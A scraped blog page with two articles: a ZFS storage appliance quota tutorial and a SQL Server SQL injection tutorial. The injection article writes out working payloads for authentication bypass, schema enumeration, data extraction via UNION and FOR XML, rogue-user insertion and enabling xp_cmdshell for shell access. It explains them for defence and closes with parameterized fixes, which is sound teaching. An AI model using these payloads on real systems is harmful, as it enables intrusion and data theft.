So you don't want your users to fill up your entire storage pool with their MP3 files, right? Good idea to make some quotas. There are some good tips and tricks here, including a helpful workflow (a script) that will allow you to set a default quota on all of the users of a share at once. Let's start with some basics. I made a project called "small" and inside it I made a share called "Share1". You can set quotas on the project level, which will affect all of the shares in it, or you can do it on the share level like I am here. Go to the share's General property page. First, I'm using a Windows client, so I need to make sure I have my SMB mountpoint. Do you know this trick yet? Go to the Protocol page of the share. See the SMB section? It needs a resource name to make the UNC path for the SMB (Windows) users. You do NOT have to type this name in for every share you make! Do this at the Project level. Before you make any shares, go to the Protocol properties of the Project, and set the SMB Resource name to "On". This special code will automatically make the SMB resource name of every share in the project the same as the share name. Note the UNC path name I got below. Since I did this at the Project level, I didn't have to lift a finger for it to work on every share I make in this project. Simple. So I have now mapped my Windows "Z:" drive to this Share1. I logged in as the user "Joe". Note that my computer shows my Z: drive as 34GB, which is the entire size of my Pool that this share is in. Right now, Joe could fill this drive up and it would fill up my pool. Now, go back to the General properties of Share1. In the "Space Usage" area, over on the right, click on the "Show All" text under the Users & Groups section. Sure enough, Joe and some other users are in here and have some data. Note this is also a handy window to use just to see how much space your users are using in any given share. Ok, Joe owes us money from lunch last week, so we want to give him a quota of 100MB. Type his name in the Users box. Notice how it now shows you how much data he's currently using. Go ahead and give him a 100M quota and hit the Apply button. If I go back to "Show All", I can see that Joe now has a quota, and no one else does. Sure enough, as soon as I refresh my screen back on Joe's client, he sees that his Z: drive is now only 100MB, and he's more than half way full. That was easy enough, but what if you wanted to make the whole share have a quota, so that the share itself, no matter who uses it, can only grow to a certain size? That's even easier. Just use the Quota box on the left hand side. Here, I use a Quota on the share of 300MB. So now I log off as Joe, and log in as Steve. Even though Steve does NOT have a quota, it is showing my Z: drive as 300MB. This would affect anyone, INCLUDING the ROOT user, because you specified the Quota to be on the SHARE, not on a person. Note that back in the Share, if you click the "Show All" text, the window does NOT show Steve, or anyone else, to have a quota of 300MB. Yet we do, because it's on the share itself, not on any user, so this panel does not see that. Ok, here is where it gets FUN.... Let's say you do NOT want a quota on the SHARE, because you want SOME people, like Root and yourself, to have FULL access to it and you want the ability to fill the whole thing up if you darn well feel like it. HOWEVER, you want to give the other users a quota.
HOWEVER you have, say, 200 users, and you do NOT feel like typing in each of their names and giving them each a quota, and they are not all members of an AD global group you could use or anything like that. Hmmmmmm.... No worries, mate. We have a handy-dandy script that can do this for us. Now, this script was written a few years back by Tim Graves, one of our ZFSSA engineers out of the UK. This is not my script. It is NOT supported by Oracle support in any way. It does work fine with the 2011.1.4 code as best as I can tell, but Oracle, and I, are NOT responsible for ANYTHING that you do with this script. Furthermore, I will NOT give you this script, so do not ask me for it. You need to get this from your local Oracle storage SC. I will give it to them. I want this only going to my fellow SCs, who can then work with you to have it and show you how it works. Here's what it does...Once you add this workflow to the Maintenance-->Workflows section, you click it once to run it. Nothing seems to happen at this point, but something did. Go back to any share or project. You will see that you now have four new, custom properties on the bottom. Do NOT touch the bottom two properties, EVER. Only touch the top two. Here, I'm going to give my users a default quota of about 40MB each. The beauty of this script is that it will only affect users that do NOT already have any kind of personal quota. It will only change people who have no quota at all. It does not affect the Root user. After I hit Apply on the Share screen, nothing will happen until I go back and run the script again. The first time you run it, it creates the custom properties. The second and all subsequent times you run it, it checks the shares for any users, and applies your quota number to each one of them, UNLESS they already have one set. Notice in the readout below how it did NOT apply to my Joe user, since Joe had a quota set. Sure enough, when I go back to the "Show All" in the share properties, all of the users who did not have a quota now have one for 39.1MB. Hmmm... I did my math wrong, didn't I? That's OK, I'll just change the number of the Custom Default quota again. Here, I am adding a zero on the end. After I click Apply, and then run the script again, all of my users, except Joe, now have a quota of 391MB. You can customize a person at any time. Here, I took the Steve user, and specifically gave him a Quota of zero. Now when I run the script again, he is different from the rest, so he is no longer affected by the script. Under Show All, I see that Joe is at 100, and Steve has no Quota at all. I can do this all day long. Yes, you will have to re-run the script every time new users get added. The script only applies the default quota to users that are present at the time the script is run. However, it would be a simple thing to schedule the script to run each night, or to make an alert that runs the script when certain events occur. For you power users, if you ever want to delete these custom properties and remove the script completely, you will find these properties under the "Schema" section under the Shares section. You can remove them here. There's no need to, however; they don't hurt a thing if you just don't use them. I hope these tips have helped you out there. Quotas can be fun.

    Read the article

  • SQL Server SQL Injection from start to end

    - by Mladen Prajdic
    SQL injection is a method by which a hacker gains access to the database server by injecting specially formatted data through the user interface input fields. In the last few years we have witnessed a huge increase in the number of reported SQL injection attacks, many of which caused a great deal of damage. A SQL injection attack takes many guises, but the underlying method is always the same. The specially formatted data starts with an apostrophe (') to end the string column (usually username) check, continues with malicious SQL, and then ends with the SQL comment mark (--) in order to comment out the full original SQL that was intended to be submitted. The really advanced methods use binary or encoded text inputs instead of clear text. SQL injection vulnerabilities are often thought to be a database server problem. In reality they are a pure application design problem, generally resulting from unsafe techniques for dynamically constructing SQL statements that require user input. It also doesn't help that many web pages allow SQL Server error messages to be exposed to the user, having no input clean up or validation, allowing applications to connect with elevated (e.g. sa) privileges and so on. Usually that's caused by novice developers who just copy-and-paste code found on the internet without understanding the possible consequences. The first line of defense is to never let your applications connect via an admin account like sa. This account has full privileges on the server and so you virtually give the attacker open access to all your databases, servers, and network. The second line of defense is never to expose SQL Server error messages to the end user. Finally, always use safe methods for building dynamic SQL, using properly parameterized statements. Hopefully, all of this will be clearly demonstrated as we demonstrate two of the most common ways that enable SQL injection attacks, and how to remove the vulnerability. 1) Concatenating SQL statements on the client by hand 2) Using parameterized stored procedures but passing in parts of SQL statements As will become clear, SQL Injection vulnerabilities cannot be solved by simple database refactoring; often, both the application and database have to be redesigned to solve this problem. Concatenating SQL statements on the client This problem is caused when user-entered data is inserted into a dynamically-constructed SQL statement, by string concatenation, and then submitted for execution. Developers often think that some method of input sanitization is the solution to this problem, but the correct solution is to correctly parameterize the dynamic SQL. In this simple example, the code accepts a username and password and, if the user exists, returns the requested data. First the SQL code is shown that builds the table and test data then the C# code with the actual SQL Injection example from beginning to the end. The comments in code provide information on what actually happens. /* SQL CODE *//* Users table holds usernames and passwords and is the object of out hacking attempt */CREATE TABLE Users( UserId INT IDENTITY(1, 1) PRIMARY KEY , UserName VARCHAR(50) , UserPassword NVARCHAR(10))/* Insert 2 users */INSERT INTO Users(UserName, UserPassword)SELECT 'User 1', 'MyPwd' UNION ALLSELECT 'User 2', 'BlaBla' Vulnerable C# code, followed by a progressive SQL injection attack. /* .NET C# CODE *//*This method checks if a user exists. 
It uses SQL concatination on the client, which is susceptible to SQL injection attacks*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=YourServerName; database=tempdb; Integrated Security=SSPI;")) { /* This is the SQL string you usually see with novice developers. It returns a row if a user exists and no rows if it doesn't */ string sql = "SELECT * FROM Users WHERE UserName = '" + username + "' AND UserPassword = '" + password + "'"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists != "0"; } }}/*The SQL injection attack example. Username inputs should be run one after the other, to demonstrate the attack pattern.*/string username = "User 1";string password = "MyPwd";// See if we can even use SQL injection.// By simply using this we can log into the application username = "' OR 1=1 --";// What follows is a step-by-step guessing game designed // to find out column names used in the query, via the // error messages. By using GROUP BY we will get // the column names one by one.// First try the Idusername = "' GROUP BY Id HAVING 1=1--";// We get the SQL error: Invalid column name 'Id'.// From that we know that there's no column named Id. // Next up is UserIDusername = "' GROUP BY Users.UserId HAVING 1=1--";// AHA! here we get the error: Column 'Users.UserName' is // invalid in the SELECT list because it is not contained // in either an aggregate function or the GROUP BY clause.// We have guessed correctly that there is a column called // UserId and the error message has kindly informed us of // a table called Users with a column called UserName// Now we add UserName to our GROUP BYusername = "' GROUP BY Users.UserId, Users.UserName HAVING 1=1--";// We get the same error as before but with a new column // name, Users.UserPassword// Repeat this pattern till we have all column names that // are being return by the query.// Now we have to get the column data types. One non-string // data type is all we need to wreck havoc// Because 0 can be implicitly converted to any data type in SQL server we use it to fill up the UNION.// This can be done because we know the number of columns the query returns FROM our previous hacks.// Because SUM works for UserId we know it's an integer type. 
It doesn't matter which exactly.username = "' UNION SELECT SUM(Users.UserId), 0, 0 FROM Users--";// SUM() errors out for UserName and UserPassword columns giving us their data types:// Error: Operand data type varchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserName) FROM Users--";// Error: Operand data type nvarchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserPassword) FROM Users--";// Because we know the Users table structure we can insert our data into itusername = "'; INSERT INTO Users(UserName, UserPassword) SELECT 'Hacker user', 'Hacker pwd'; --";// Next let's get the actual data FROM the tables.// There are 2 ways you can do this.// The first is by using MIN on the varchar UserName column and // getting the data from error messages one by one like this:username = "' UNION SELECT min(UserName), 0, 0 FROM Users --";username = "' UNION SELECT min(UserName), 0, 0 FROM Users WHERE UserName > 'User 1'--";// we can repeat this method until we get all data one by one// The second method gives us all data at once and we can use it as soon as we find a non string columnusername = "' UNION SELECT (SELECT * FROM Users FOR XML RAW) as c1, 0, 0 --";// The error we get is: // Conversion failed when converting the nvarchar value // '<row UserId="1" UserName="User 1" UserPassword="MyPwd"/>// <row UserId="2" UserName="User 2" UserPassword="BlaBla"/>// <row UserId="3" UserName="Hacker user" UserPassword="Hacker pwd"/>' // to data type int.// We can see that the returned XML contains all table data including our injected user account.// By using the XML trick we can get any database or server info we wish as long as we have access// Some examples:// Get info for all databasesusername = "' UNION SELECT (SELECT name, dbid, convert(nvarchar(300), sid) as sid, cmptlevel, filename FROM master..sysdatabases FOR XML RAW) as c1, 0, 0 --";// Get info for all tables in master databaseusername = "' UNION SELECT (SELECT * FROM master.INFORMATION_SCHEMA.TABLES FOR XML RAW) as c1, 0, 0 --";// If that's not enough here's a way the attacker can gain shell access to your underlying windows server// This can be done by enabling and using the xp_cmdshell stored procedure// Enable xp_cmdshellusername = "'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;";// Create a table to store the values returned by xp_cmdshellusername = "'; CREATE TABLE ShellHack (ShellData NVARCHAR(MAX))--";// list files in the current SQL Server directory with xp_cmdshell and store it in ShellHack table username = "'; INSERT INTO ShellHack EXEC xp_cmdshell \"dir\"--";// return the data via an error messageusername = "' UNION SELECT (SELECT * FROM ShellHack FOR XML RAW) as c1, 0, 0; --";// delete the table to get clean output (this step is optional)username = "'; DELETE ShellHack; --";// repeat the upper 3 statements to do other nasty stuff to the windows server// If the returned XML is larger than 8k you'll get the "String or binary data would be truncated." error// To avoid this chunk up the returned XML using paging techniques. // the username and password params come from the GUI textboxes.bool userExists = DoesUserExist(username, password ); Having demonstrated all of the information a hacker can get his hands on as a result of this single vulnerability, it's perhaps reassuring to know that the fix is very easy: use parameters, as show in the following example. 
/* The fixed C# method that doesn't suffer from SQL injection because it uses parameters.*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=baltazar\sql2k8; database=tempdb; Integrated Security=SSPI;")) { //This is the version of the SQL string that should be safe from SQL injection string sql = "SELECT * FROM Users WHERE UserName = @username AND UserPassword = @password"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; // adding 2 SQL Parameters solves the SQL injection issue completely SqlParameter usernameParameter = new SqlParameter(); usernameParameter.ParameterName = "@username"; usernameParameter.DbType = DbType.String; usernameParameter.Value = username; cmd.Parameters.Add(usernameParameter); SqlParameter passwordParameter = new SqlParameter(); passwordParameter.ParameterName = "@password"; passwordParameter.DbType = DbType.String; passwordParameter.Value = password; cmd.Parameters.Add(passwordParameter); cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists == "1"; }} We have seen just how much danger we're in, if our code is vulnerable to SQL Injection. If you find code that contains such problems, then refactoring is not optional; it simply has to be done and no amount of deadline pressure should be a reason not to do it. Better yet, of course, never allow such vulnerabilities into your code in the first place. Your business is only as valuable as your data. If you lose your data, you lose your business. Period. Incorrect parameterization in stored procedures It is a common misconception that the mere act of using stored procedures somehow magically protects you from SQL Injection. There is no truth in this rumor. If you build SQL strings by concatenation and rely on user input then you are just as vulnerable doing it in a stored procedure as anywhere else. This anti-pattern often emerges when developers want to have a single "master access" stored procedure to which they'd pass a table name, column list or some other part of the SQL statement. This may seem like a good idea from the viewpoint of object reuse and maintenance but it's a huge security hole. The following example shows what a hacker can do with such a setup. 
/*Create a single master access stored procedure*/CREATE PROCEDURE spSingleAccessSproc( @select NVARCHAR(500) = '' , @tableName NVARCHAR(500) = '' , @where NVARCHAR(500) = '1=1' , @orderBy NVARCHAR(500) = '1')ASEXEC('SELECT ' + @select + ' FROM ' + @tableName + ' WHERE ' + @where + ' ORDER BY ' + @orderBy)GO/*Valid use as anticipated by a novice developer*/EXEC spSingleAccessSproc @select = '*', @tableName = 'Users', @where = 'UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = 'UserID'/*Malicious use SQL injectionThe SQL injection principles are the same aswith SQL string concatenation I described earlier,so I won't repeat them again here.*/EXEC spSingleAccessSproc @select = '* FROM INFORMATION_SCHEMA.TABLES FOR XML RAW --', @tableName = '--Users', @where = '--UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = '--UserID' One might think that this is a "made up" example but in all my years of reading SQL forums and answering questions there were quite a few people with "brilliant" ideas like this one. Hopefully I've managed to demonstrate the dangers of such code. Even if you think your code is safe, double check. If there's even one place where you're not using proper parameterized SQL you have vulnerability and SQL injection can bare its ugly teeth.
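The parameterized fix is shown above for client code but not for the stored-procedure case. For completeness, here is a sketch of how dynamic SQL inside a procedure stays safe with sp_executesql: user values travel as parameters, so they can never change the shape of the statement.

    -- A sketch: the dynamic string contains only parameter markers,
    -- never concatenated user input.
    CREATE PROCEDURE spDoesUserExist
        @username VARCHAR(50),
        @password NVARCHAR(10)
    AS
    BEGIN
        DECLARE @sql NVARCHAR(500)
        SET @sql = N'SELECT * FROM Users
                     WHERE UserName = @u AND UserPassword = @p'
        EXEC sp_executesql @sql,
             N'@u VARCHAR(50), @p NVARCHAR(10)',
             @u = @username, @p = @password
    END
    GO

Anything structural (a table or column name, an ORDER BY target) cannot be parameterized this way; such values have to be validated against a whitelist before being placed into the statement.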

    Read the article

< Previous Page | 73 74 75 76 77 78 79 80  | Next Page >